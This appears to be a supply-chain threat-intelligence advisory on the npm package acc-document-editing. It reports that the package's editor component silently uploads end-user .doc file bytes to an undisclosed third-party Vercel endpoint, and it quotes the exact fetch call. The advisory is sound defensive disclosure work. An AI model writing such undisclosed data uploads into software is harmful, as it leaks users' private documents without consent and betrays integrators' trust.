Supply-chain threat intelligence
Risk score
92
Indexed incident for acc-document-editing (npm).
The DocumentEditor React component exported by this package, when an end-user opens a .doc file, POSTs the raw file bytes to https://converter-apis.vercel.app/api/convert — a generic Vercel-hosted endpoint that is not OnlyOffice and is not disclosed in the package's README or API documentation. The README advertises a self-hosted OnlyOffice/X2T integration (X2T conversion runs locally in WASM), so integrators reasonably expect document content to stay on their own infrastructure. The .doc handling path in dist/index.cjs:565 (fetch("https://converter-apis.vercel.app/api/convert", { method: "POST", body: new Blob([arrayBuffer], { type: "application/msword" }) })) silently relays end-user document bytes to the package author's chosen third-party endpoint with no consent UI, no documentation, and no configuration option to disable or redirect the upload. The destination is a generic free-tier Vercel hostname rather than an OnlyOffice domain, breaking the trust expectation of the advertised self-hosted editor. The postinstall script that copies static assets into the host project's public/ directory, and the child_process/fetch references inside the bundled X2T WASM toolchain, are documented and purpose-matched (X2T is the OnlyOffice document conversion tool); those are not the basis for the verdict.
Affected versions
Indicators
Timeline